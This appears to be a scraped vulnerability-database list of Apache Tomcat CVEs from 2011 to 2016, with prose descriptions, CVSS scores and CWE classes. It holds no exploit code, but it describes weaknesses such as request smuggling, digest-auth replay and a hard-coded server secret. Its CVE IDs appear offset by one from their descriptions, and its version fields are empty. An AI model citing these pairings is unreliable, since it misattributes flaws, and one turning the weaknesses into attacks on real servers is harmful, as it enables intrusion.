Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.

Vulnerable Software & Versions:

CVE-2011-1088  

Severity:Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N)

Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.

Vulnerable Software & Versions:

CVE-2011-1184  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.

Vulnerable Software & Versions:

CVE-2011-1419  

Severity:Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N)

Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.

Vulnerable Software & Versions:

CVE-2011-1475  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-20 Improper Input Validation

The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."

Vulnerable Software & Versions:

CVE-2011-2204  

Severity:Low
CVSS Score: 1.9 (AV:L/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.

Vulnerable Software & Versions:

CVE-2011-2481  

Severity:Medium
CVSS Score: 4.6 (AV:L/AC:L/Au:N/C:P/I:P/A:P)

Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.  NOTE: this vulnerability exists because of a CVE-2009-0783 regression.

Vulnerable Software & Versions:

CVE-2011-2526  

Severity:Medium
CVSS Score: 4.4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.

Vulnerable Software & Versions:

CVE-2011-2729  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.

Vulnerable Software & Versions:

CVE-2011-3190  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.

Vulnerable Software & Versions:

CVE-2011-3375  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.

Vulnerable Software & Versions:

CVE-2011-3376  

Severity:Medium
CVSS Score: 4.4 (AV:L/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.

Vulnerable Software & Versions:

CVE-2011-4858  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.

Vulnerable Software & Versions:

CVE-2011-5062  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.

Vulnerable Software & Versions:

CVE-2011-5063  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-287 Improper Authentication

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.

Vulnerable Software & Versions:

CVE-2011-5064  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.

Vulnerable Software & Versions:

CVE-2012-0022  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-189 Numeric Errors

Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.

Vulnerable Software & Versions:

CVE-2012-2733  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.

Vulnerable Software & Versions:

CVE-2012-3544  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.

Vulnerable Software & Versions:

CVE-2012-3546  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.

Vulnerable Software & Versions:

CVE-2012-4431  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.

Vulnerable Software & Versions:

CVE-2012-4534  

Severity:Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.

Vulnerable Software & Versions:

CVE-2012-5568  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-16 Configuration

Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.

Vulnerable Software & Versions:

CVE-2012-5885  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.

Vulnerable Software & Versions:

CVE-2012-5886  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-287 Improper Authentication

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.

Vulnerable Software & Versions:

CVE-2012-5887  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-287 Improper Authentication

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.

Vulnerable Software & Versions:

CVE-2013-0346  

Severity:Low
CVSS Score: 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

** DISPUTED ** Apache Tomcat 7.x uses world-readable permissions for the log directory and its files, which might allow local users to obtain sensitive information by reading a file.  NOTE: One Tomcat distributor has stated "The tomcat log directory does not contain any sensitive information."

Vulnerable Software & Versions:

CVE-2013-2067  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-287 Improper Authentication

java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.

Vulnerable Software & Versions:

CVE-2013-2071  

Severity:Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.

Vulnerable Software & Versions:

CVE-2013-2185  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

** DISPUTED ** The readObject method in the DiskFileItem class in Apache Tomcat and JBoss Web, as used in Red Hat JBoss Enterprise Application Platform 6.1.0 and Red Hat JBoss Portal 6.0.0, allows remote attackers to write to arbitrary files via a NULL byte in a file name in a serialized instance, a similar issue to CVE-2013-2186.  NOTE: this issue is reportedly disputed by the Apache Tomcat team, although Red Hat considers it a vulnerability. The dispute appears to regard whether it is the responsibility of applications to avoid providing untrusted data to be deserialized, or whether this class should inherently protect against this issue.

Vulnerable Software & Versions:

CVE-2013-4286  

Severity:Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N)
CWE: CWE-20 Improper Input Validation

Apache Tomcat before 6.0.39, 7.x before 7.0.47, and 8.x before 8.0.0-RC3, when an HTTP connector or AJP connector is used, does not properly handle certain inconsistent HTTP request headers, which allows remote attackers to trigger incorrect identification of a request's length and conduct request-smuggling attacks via (1) multiple Content-Length headers or (2) a Content-Length header and a "Transfer-Encoding: chunked" header.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2005-2090.

Vulnerable Software & Versions:

CVE-2013-4322  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

Apache Tomcat before 6.0.39, 7.x before 7.0.50, and 8.x before 8.0.0-RC10 processes chunked transfer coding without properly handling (1) a large total amount of chunked data or (2) whitespace characters in an HTTP header value within a trailer field, which allows remote attackers to cause a denial of service by streaming data.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-3544.

Vulnerable Software & Versions:

CVE-2013-4444  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-94 Improper Control of Generation of Code ('Code Injection')

Unrestricted file upload vulnerability in Apache Tomcat 7.x before 7.0.40, in certain situations involving outdated java.io.File code and a custom JMX configuration, allows remote attackers to execute arbitrary code by uploading and accessing a JSP file.

Vulnerable Software & Versions:

CVE-2013-4590  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Apache Tomcat before 6.0.39, 7.x before 7.0.50, and 8.x before 8.0.0-RC10 allows attackers to obtain "Tomcat internals" information by leveraging the presence of an untrusted web application with a context.xml, web.xml, *.jspx, *.tagx, or *.tld XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

Vulnerable Software & Versions:

CVE-2014-0050  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.

Vulnerable Software & Versions:

CVE-2014-0075  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-189 Numeric Errors

Integer overflow in the parseChunkHeader function in java/org/apache/coyote/http11/filters/ChunkedInputFilter.java in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4 allows remote attackers to cause a denial of service (resource consumption) via a malformed chunk size in chunked transfer coding of a request during the streaming of data.

Vulnerable Software & Versions:

CVE-2014-0096  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

java/org/apache/catalina/servlets/DefaultServlet.java in the default servlet in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4 does not properly restrict XSLT stylesheets, which allows remote attackers to bypass security-manager restrictions and read arbitrary files via a crafted web application that provides an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

Vulnerable Software & Versions:

CVE-2014-0099  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-189 Numeric Errors

Integer overflow in java/org/apache/tomcat/util/buf/Ascii.java in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4, when operated behind a reverse proxy, allows remote attackers to conduct HTTP request smuggling attacks via a crafted Content-Length HTTP header.

Vulnerable Software & Versions:

CVE-2014-0119  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

Apache Tomcat before 6.0.40, 7.x before 7.0.54, and 8.x before 8.0.6 does not properly constrain the class loader that accesses the XML parser used with an XSLT stylesheet, which allows remote attackers to (1) read arbitrary files via a crafted web application that provides an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, or (2) read files associated with different web applications on a single Tomcat instance via a crafted web application.

Vulnerable Software & Versions:

CVE-2014-0227  

Severity:Medium
CVSS Score: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)
CWE: CWE-19 Data Processing Errors

java/org/apache/coyote/http11/filters/ChunkedInputFilter.java in Apache Tomcat 6.x before 6.0.42, 7.x before 7.0.55, and 8.x before 8.0.9 does not properly handle attempts to continue reading data after an error has occurred, which allows remote attackers to conduct HTTP request smuggling attacks or cause a denial of service (resource consumption) by streaming data with malformed chunked transfer coding.

Vulnerable Software & Versions:

CVE-2014-0230  

Severity:High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-399 Resource Management Errors

Apache Tomcat 6.x before 6.0.44, 7.x before 7.0.55, and 8.x before 8.0.9 does not properly handle cases where an HTTP response occurs before finishing the reading of an entire request body, which allows remote attackers to cause a denial of service (thread consumption) via a series of aborted upload attempts.

Vulnerable Software & Versions:

CVE-2014-7810  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-284 Improper Access Control

The Expression Language (EL) implementation in Apache Tomcat 6.x before 6.0.44, 7.x before 7.0.58, and 8.x before 8.0.16 does not properly consider the possibility of an accessible interface implemented by an inaccessible class, which allows attackers to bypass a SecurityManager protection mechanism via a web application that leverages use of incorrect privileges during EL evaluation.

Vulnerable Software & Versions:

CVE-2015-5174  

Severity:Medium
CVSS Score: 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Directory traversal vulnerability in RequestUtil.java in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.65, and 8.x before 8.0.27 allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application in a getResource, getResourceAsStream, or getResourcePaths call, as demonstrated by the $CATALINA_BASE/webapps directory.

Vulnerable Software & Versions:

CVE-2015-5345  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The Mapper component in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.30, and 9.x before 9.0.0.M2 processes redirects before considering security constraints and Filters, which allows remote attackers to determine the existence of a directory via a URL that lacks a trailing / (slash) character.

Vulnerable Software & Versions:

CVE-2015-5346  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)

Session fixation vulnerability in Apache Tomcat 7.x before 7.0.66, 8.x before 8.0.30, and 9.x before 9.0.0.M2, when different session settings are used for deployments of multiple versions of the same web application, might allow remote attackers to hijack web sessions by leveraging use of a requestedSessionSSL field for an unintended request, related to CoyoteAdapter.java and Request.java.

Vulnerable Software & Versions:

CVE-2015-5351  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-352 Cross-Site Request Forgery (CSRF)

The (1) Manager and (2) Host Manager applications in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 establish sessions and send CSRF tokens for arbitrary new requests, which allows remote attackers to bypass a CSRF protection mechanism by using a token.

Vulnerable Software & Versions:

CVE-2016-0706  

Severity:Medium
CVSS Score: 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 does not place org.apache.catalina.manager.StatusManagerServlet on the org/apache/catalina/core/RestrictedServlets.properties list, which allows remote authenticated users to bypass intended SecurityManager restrictions and read arbitrary HTTP requests, and consequently discover session ID values, via a crafted web application.

Vulnerable Software & Versions:

CVE-2016-0714  

Severity:Medium
CVSS Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The session-persistence implementation in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 mishandles session attributes, which allows remote authenticated users to bypass intended SecurityManager restrictions and execute arbitrary code in a privileged context via a web application that places a crafted object in a session.

Vulnerable Software & Versions:

CVE-2016-0762  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Realm implementations in Apache Tomcat versions 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not process the supplied password if the supplied user name did not exist. This made a timing attack possible to determine valid user names. Note that the default configuration includes the LockOutRealm which makes exploitation of this vulnerability harder.

Vulnerable Software & Versions:

CVE-2016-0763  

Severity:Medium
CVSS Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The setGlobalContext method in org/apache/naming/factory/ResourceLinkFactory.java in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M3 does not consider whether ResourceLinkFactory.setGlobalContext callers are authorized, which allows remote authenticated users to bypass intended SecurityManager restrictions and read or write to arbitrary application data, or cause a denial of service (application disruption), via a web application that sets a crafted global context.

Vulnerable Software & Versions:

CVE-2016-1240  

Severity:High
CVSS Score: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-20 Improper Input Validation

The Tomcat init script in the tomcat7 package before 7.0.56-3+deb8u4 and tomcat8 package before 8.0.14-1+deb8u3 on Debian jessie and the tomcat6 and libtomcat6-java packages before 6.0.35-1ubuntu3.8 on Ubuntu 12.04 LTS, the tomcat7 and libtomcat7-java packages before 7.0.52-1ubuntu0.7 on Ubuntu 14.04 LTS, and tomcat8 and libtomcat8-java packages before 8.0.32-1ubuntu1.2 on Ubuntu 16.04 LTS allows local users with access to the tomcat account to gain root privileges via a symlink attack on the Catalina log file, as demonstrated by /var/log/tomcat7/catalina.out.

Vulnerable Software & Versions:

CVE-2016-3092  

Severity:High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-20 Improper Input Validation

The MultipartStream class in Apache Commons Fileupload before 1.3.2, as used in Apache Tomcat 7.x before 7.0.70, 8.x before 8.0.36, 8.5.x before 8.5.3, and 9.x before 9.0.0.M7 and other products, allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string.

Vulnerable Software & Versions:

CVE-2016-5018  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-254 7PK - Security Features

In Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 a malicious web application was able to bypass a configured SecurityManager via a Tomcat utility method that was accessible to web applications.

Vulnerable Software & Versions:

CVE-2016-5388  

Severity:Medium
CVSS Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
CWE: CWE-284 Improper Access Control

Apache Tomcat 7.x through 7.0.70 and 8.x through 8.5.4, when the CGI Servlet is enabled, follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an "httpoxy" issue. NOTE: the vendor states "A mitigation is planned for future releases of Tomcat, tracked as CVE-2016-5388"; in other words, this is not a CVE ID for a vulnerability.

Vulnerable Software & Versions:

CVE-2016-5425  

Severity:High
CVSS Score: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Tomcat package on Red Hat Enterprise Linux (RHEL) 7, Fedora, CentOS, Oracle Linux, and possibly other Linux distributions uses weak permissions for /usr/lib/tmpfiles.d/tomcat.conf, which allows local users to gain root privileges by leveraging membership in the tomcat group.

Vulnerable Software & Versions:

CVE-2016-6325  

Severity:High
CVSS Score: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Tomcat package on Red Hat Enterprise Linux (RHEL) 5 through 7, JBoss Web Server 3.0, and JBoss EWS 2 uses weak permissions for (1) /etc/sysconfig/tomcat and (2) /etc/tomcat/tomcat.conf, which allows local users to gain privileges by leveraging membership in the tomcat group.

Vulnerable Software & Versions:

CVE-2016-6794  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

When a SecurityManager is configured, a web application's ability to read system properties should be controlled by the SecurityManager. In Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70, 6.0.0 to 6.0.45 the system property replacement feature for configuration files could be used by a malicious web application to bypass the SecurityManager and read system properties that should not be visible.

Vulnerable Software & Versions:

CVE-2016-6796  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-254 7PK - Security Features

A malicious web application running on Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 was able to bypass a configured SecurityManager via manipulation of the configuration parameters for the JSP Servlet.

Vulnerable Software & Versions:

CVE-2016-6797  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-284 Improper Access Control

The ResourceLinkFactory implementation in Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not limit web application access to global JNDI resources to those resources explicitly linked to the web application. Therefore, it was possible for a web application to access any global JNDI resource whether an explicit ResourceLink had been configured or not.

Vulnerable Software & Versions:

CVE-2016-6816  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

The code in Apache Tomcat 9.0.0.M1 to 9.0.0.M11, 8.5.0 to 8.5.6, 8.0.0.RC1 to 8.0.38, 7.0.0 to 7.0.72, and 6.0.0 to 6.0.47 that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other than their own.

Vulnerable Software & Versions:

CVE-2016-8735  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-284 Improper Access Control

Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.

Vulnerable Software & Versions:

CVE-2016-8745  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-388

A bug in the error handling of the send file code for the NIO HTTP connector in Apache Tomcat 9.0.0.M1 to 9.0.0.M13, 8.5.0 to 8.5.8, 8.0.0.RC1 to 8.0.39, 7.0.0 to 7.0.73 and 6.0.16 to 6.0.48 resulted in the current Processor object being added to the Processor cache multiple times. This in turn meant that the same Processor could be used for concurrent requests. Sharing a Processor can result in information leakage between requests including, but not limited to, session ID and the response body. The bug was first noticed in 8.5.x onwards where it appears the refactoring of the Connector code for 8.5.x onwards made it more likely that the bug was observed. Initially it was thought that the 8.5.x refactoring introduced the bug but further investigation has shown that the bug is present in all currently supported Tomcat versions.

Vulnerable Software & Versions:

CVE-2016-9774  

Severity:High
CVSS Score: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-59 Improper Link Resolution Before File Access ('Link Following')

